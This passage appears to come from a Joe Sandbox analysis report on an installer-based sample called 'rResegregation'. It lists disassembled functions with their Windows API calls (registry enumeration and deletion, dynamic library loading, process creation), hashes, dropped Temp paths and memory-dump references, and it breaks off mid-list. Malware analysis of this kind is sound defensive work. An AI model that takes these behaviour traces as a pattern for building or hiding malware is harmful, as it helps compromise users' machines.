                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Close$DeleteEnumOpen
                                                                  • String ID:
                                                                  • API String ID: 1912718029-0
                                                                  • Opcode ID: b56f379d4c7718a716cd2f0f4935c5eaa8b38fc1cc2d991abe85072f08e57da9
                                                                  • Instruction ID: 557db050c0314b8bb5c0b22d2db4fc3530b60cfc711b7b252a141f8c1691c263
                                                                  • Opcode Fuzzy Hash: b56f379d4c7718a716cd2f0f4935c5eaa8b38fc1cc2d991abe85072f08e57da9
                                                                  • Instruction Fuzzy Hash: 82114272900109FFEF229F50DE89DAE3B7DEB54344B104436F901B10A0D7B59E51DB69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                    • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                    • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                  • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                    • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                    • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                    • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,10004010,00000000,10001695,00000000), ref: 10001572
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28770977477.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                  • Associated: 00000000.00000002.28770951337.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28771003199.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28771028957.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_10000000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                  • String ID:
                                                                  • API String ID: 1791698881-3916222277
                                                                  • Opcode ID: 676a92eb632660267f66b66a0e8313324764f953d5bc12d8e45a65eb3bf091b8
                                                                  • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                                  • Opcode Fuzzy Hash: 676a92eb632660267f66b66a0e8313324764f953d5bc12d8e45a65eb3bf091b8
                                                                  • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401F90 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB
                                                                    • Part of subcall function 00404F25: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                    • Part of subcall function 00404F25: lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                    • Part of subcall function 00404F25: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0), ref: 00404F81
                                                                    • Part of subcall function 00404F25: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll), ref: 00404F93
                                                                    • Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                    • Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                    • Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                  • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 2987980305-0
                                                                  • Opcode ID: 05c8e021a7a7f73ce592bb1d623faec27b59f04a76483d1fd0bf651fb880023d
                                                                  • Instruction ID: a6d6138a22214a2ec3127db012fcbe8ccdb9873b287714200ab65a7954d0c462
                                                                  • Opcode Fuzzy Hash: 05c8e021a7a7f73ce592bb1d623faec27b59f04a76483d1fd0bf651fb880023d
                                                                  • Instruction Fuzzy Hash: 93212B72904211EBDF217F648E4DAAE76B1AB45318F30423BF311B62D1C7BC4941DA6E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00405817: CharNextA.USER32(?,?,Mundstykket.min,?,00405883,Mundstykket.min,Mundstykket.min,76483410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405825
                                                                    • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040582A
                                                                    • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040583E
                                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                    • Part of subcall function 004053EB: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040542E
                                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\brummedes\janthinidae\Uhyre,00000000,00000000,000000F0), ref: 00401634
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\brummedes\janthinidae\Uhyre, xrefs: 00401629
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\brummedes\janthinidae\Uhyre
                                                                  • API String ID: 1892508949-2936765130
                                                                  • Opcode ID: 73aee729b28fb73f9d8e4b10f4e7109390eb8d9f0c8663a15968dc92b5e27352
                                                                  • Instruction ID: 6ea9d176647784ede47dca84986b1d8040ea6f7a989068fde2debc666839409d
                                                                  • Opcode Fuzzy Hash: 73aee729b28fb73f9d8e4b10f4e7109390eb8d9f0c8663a15968dc92b5e27352
                                                                  • Instruction Fuzzy Hash: A2112B35404141ABDF217B650C405BF27F0EA92315738463FF591B22E2C63C0942A63F
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040549D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0079FD48,Error launching installer), ref: 004054C6
                                                                  • CloseHandle.KERNEL32(?), ref: 004054D3
                                                                  Strings
                                                                  • Error launching installer, xrefs: 004054B0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcess
                                                                  • String ID: Error launching installer
                                                                  • API String ID: 3712363035-66219284
                                                                  • Opcode ID: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                                  • Instruction ID: 542db3fa263e6c3fd8363e81c561fcb1d1edc85eb607383f0aa2fc0e1be44d1e
                                                                  • Opcode Fuzzy Hash: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                                  • Instruction Fuzzy Hash: 95E0BFF4A002097FEB10AB64ED45F7B7BACEB00645F108561FD10F6190D674A9549A79
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00404F25: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                    • Part of subcall function 00404F25: lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                    • Part of subcall function 00404F25: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0), ref: 00404F81
                                                                    • Part of subcall function 00404F25: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll), ref: 00404F93
                                                                    • Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                    • Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                    • Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                    • Part of subcall function 0040549D: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0079FD48,Error launching installer), ref: 004054C6
                                                                    • Part of subcall function 0040549D: CloseHandle.KERNEL32(?), ref: 004054D3
                                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                  • String ID:
                                                                  • API String ID: 3521207402-0
                                                                  • Opcode ID: 4876c158792dead32ecf0166a33e69fc1182390f13c726ae77bf2af81063f083
                                                                  • Instruction ID: f3d89628ed1a2f536a51da31c0d1f3bff78da2cc26dd4d815c67a837da1bf94c
                                                                  • Opcode Fuzzy Hash: 4876c158792dead32ecf0166a33e69fc1182390f13c726ae77bf2af81063f083
                                                                  • Instruction Fuzzy Hash: 53016D31904114EBDF11AFA1CD89A9E7B72EF00344F10817BF601B52E1C7789A819B9A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402482 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,0000057B,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
                                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
                                                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003,00020019), ref: 004024C3
                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsoF4B.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Enum$CloseOpenValue
                                                                  • String ID:
                                                                  • API String ID: 167947723-0
                                                                  • Opcode ID: cab775b8895c8a4c4f35b0b4981659a72946dee781d42c39cc8dfcfc307467ae
                                                                  • Instruction ID: 6b9a29d885729d806435ba0af982d5db400a82278970f5f8cd94cba27a839736
                                                                  • Opcode Fuzzy Hash: cab775b8895c8a4c4f35b0b4981659a72946dee781d42c39cc8dfcfc307467ae
                                                                  • Instruction Fuzzy Hash: EDF0AD72904200AFEB11AF659E88EBB7A6DEB80344B10443AF505A61C0D6B849449A7A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 100027E8 Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28770977477.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                  • Associated: 00000000.00000002.28770951337.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28771003199.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28771028957.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_10000000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: EnumErrorLastWindows
                                                                  • String ID:
                                                                  • API String ID: 14984897-0
                                                                  • Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                  • Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
                                                                  • Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                  • Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,0000057B,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
                                                                  • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 00402440
                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsoF4B.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3677997916-0
                                                                  • Opcode ID: 9bc3e04273e98a6810bb149e060222757d35f34ba6d632a748a88059480f05af
                                                                  • Instruction ID: 3b61e3a0dd356b8eb8c6217664be55b6a4c5c12d426b24930886ed9b9a2887e1
                                                                  • Opcode Fuzzy Hash: 9bc3e04273e98a6810bb149e060222757d35f34ba6d632a748a88059480f05af
                                                                  • Instruction Fuzzy Hash: 5911A771905205EFDF14DF64CA889AEBBB4EF11348F20443FE141B62C0D2B84A45DB5A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: b63ad44f694a207690e677ec35bda8f999f5426b301403e6904e10af90410016
                                                                  • Instruction ID: 00097469377630013da62b9f7c31fbdee85021c234e60ac5accdaffcc3ed26dc
                                                                  • Opcode Fuzzy Hash: b63ad44f694a207690e677ec35bda8f999f5426b301403e6904e10af90410016
                                                                  • Instruction Fuzzy Hash: BE01F4316242209BF7194B389C04B6A3698E751354F10813BF811F62F1D678DC028B4D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402308 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,0000057B,00000000,00000022,00000000,?,?,?,00402314,00000002), ref: 00402B6C
                                                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 00402327
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
